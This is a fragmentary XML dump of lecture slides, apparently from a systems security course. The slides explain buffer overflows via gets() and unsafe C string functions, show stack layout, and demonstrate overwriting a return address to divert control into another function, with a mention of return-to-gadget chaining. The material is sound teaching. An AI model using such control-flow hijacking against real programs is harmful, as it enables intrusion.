          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;”Return” to next gadget, whatever that happens to be…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2216719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function calls have their targets encoded as a displacement from %rip.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3686125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SQL poisoning, but it’s still an injection attack</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162737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355331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is deprecated in C99 and removed from C11.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overflow vulnerabilities still exist in legacy code, and it is still possible to introduce them using other naïve string functions</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140883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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291647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Unsurprisingly, nothing bad happens when we enter only seven characters.</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730713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Because there’s some unused memory between the buffer and the edge of the stack frame, we can get away with some sloppiness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49190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…we can get away with a lot of sloppiness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414555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D5742FA-DDBF-7042-A71C-D54821FE246C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21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80499-AAA1-1245-BB73-E558D53E9F03}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21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F2E11BE-C40F-934A-86F4-62A33EEA3AA2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21</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A10C65-8725-424E-A5F7-3006C7FEFA94}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21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961AC0-3148-C74A-893F-B6A6DE16027D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21</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CBE19F-AE55-E04F-9AB3-496C848C01A8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21</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F741E-5263-414E-B593-0C7144E84B2C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21</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A1F109-8E47-8743-81F7-72A703C29E95}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21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AB537-98B9-984A-B5F1-FFB674D06485}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/20/21</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2B9CA413-552F-AE42-A1D1-0BF0A26C9852}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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l.acm.org/doi/10.1145/358198.3582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xkcd.com/32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Buffer Overflow Vulnerabilities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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Most Direct Way to Introduce Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{193E7E69-E7C4-C542-A559-19CFAC0B4892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1825625"/>
            <a:ext cx="5257800" cy="4667250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reads from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>writes to buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No way to limit number of characters read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Less-direct:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – copy arbitrary-length strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"%s"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conversion specification used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9A2F9414-D6F3-3A4D-A64E-BF52786A52CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761998" y="2423819"/>
            <a:ext cx="5257801" cy="302448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gets: read newline-terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   string from stdin into s. */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>char *gets(char *s) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    int c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    char *p = s;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    while (((c = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()) != EOF) &amp;&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           (c != '\n')) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        *p++ = c;</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 = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    return s;</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231895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1400174" y="1503279"/>
            <a:ext cx="9391651" cy="48286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caller()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.\n");</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not_caller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("Did not return to caller! (insert maniacal laugh here)\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    exit(0);</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78997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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1007F905-7BF7-1E48-AC7D-8440841CD513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="1508936"/>
            <a:ext cx="2882900" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack grows by 24 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer starts 8 bytes above stack pointer</a:t>
            </a:r>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369052" y="1626071"/>
            <a:ext cx="8795928" cy="433568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0" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21FBD7A2-640B-D843-B341-9F0B545F7214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372477" y="2273300"/>
            <a:ext cx="2374900"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76CEB8F-D023-3B4B-A8CC-9FA6DA2CBE29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232776" y="3971479"/>
            <a:ext cx="3377823" cy="368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48ECE51-447D-914C-8B46-CAD0729CB794}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9194580" y="4219011"/>
            <a:ext cx="2890381" cy="2411388"/>
            <a:chOff x="9194580" y="4219011"/>
            <a:chExt cx="2890381" cy="2411388"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D675A8BF-B583-3342-B746-B96D7FE29282}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="4941608"/>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E9500474-45A2-B447-8BA6-B40B41059051}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="4374448"/>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16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B7E5E2-EE5D-5E41-A162-AA425676F8A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="5508768"/>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B262C8F3-CD99-7441-984A-8A20B4AD00EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10614977" y="6063239"/>
              <a:ext cx="1469984" cy="5671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3133B6BF-A7EE-5C4F-B187-073ACBC46E90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9663426" y="6176963"/>
              <a:ext cx="637547" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>rsp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="19" name="Straight Arrow Connector 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F91ACABD-2F18-5140-8773-32DFFFA167F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="11" idx="3"/>
              <a:endCxn id="17" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10300973" y="6346819"/>
              <a:ext cx="314004" cy="1481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F05CF1-CD84-F347-A4B1-9503825F6DCE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9430927" y="5569808"/>
              <a:ext cx="870046" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>buffer</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%rsp+8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260DACDD-13E1-F94F-AF45-0A5AED2C9B0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="21" idx="3"/>
              <a:endCxn id="16" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10300973" y="5792348"/>
              <a:ext cx="314004" cy="10062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AD7223B-CB31-BA4B-8CD9-6EC838189A09}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9308394" y="4902022"/>
              <a:ext cx="992579" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>buffer+8</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%rsp+16</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Straight Arrow Connector 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB5CB54-727F-4C4E-B06B-59724065BA32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="27" idx="3"/>
              <a:endCxn id="14" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10300973" y="5225188"/>
              <a:ext cx="314004"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C40CD45-CC58-F44D-9DB2-BF6A51A15684}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9194580" y="4219011"/>
              <a:ext cx="1106393" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>buffer+16</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>%rsp+24</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A00FCF8C-3D09-D348-A070-9EF58D4B8477}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="32" idx="3"/>
              <a:endCxn id="15" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10300973" y="4542177"/>
              <a:ext cx="314004" cy="11585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190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1)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="10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5"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randombar(vertical)">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D0833ADB-CC0E-D645-BCDB-A982C51F194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0x70	0x06	0x40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No buffer overflow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13</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111" name="Oval 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F219790C-4D2A-C14E-8395-70B68F5944AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752601" y="5588000"/>
            <a:ext cx="2159000"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509D49C3-BF8C-2240-B9B7-996C32B7DF96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1769755" y="5384077"/>
            <a:ext cx="2159000" cy="3078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59AD8EEB-37C4-8642-8EF2-C449F6F0E4F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2849255" y="4625694"/>
            <a:ext cx="700185" cy="758383"/>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20" name="TextBox 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F52F883C-9296-6748-8F1F-4B497E385FD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1218449" y="4256362"/>
            <a:ext cx="4661982" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Values left over from earlier use of this memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="TextBox 120">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFD2575F-4D90-564B-8A09-A2D206D16060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3133599" y="6024387"/>
            <a:ext cx="1556003" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Rounded Rectangle 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34DD0D6-53B1-D346-AA59-A7F10FAC8B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
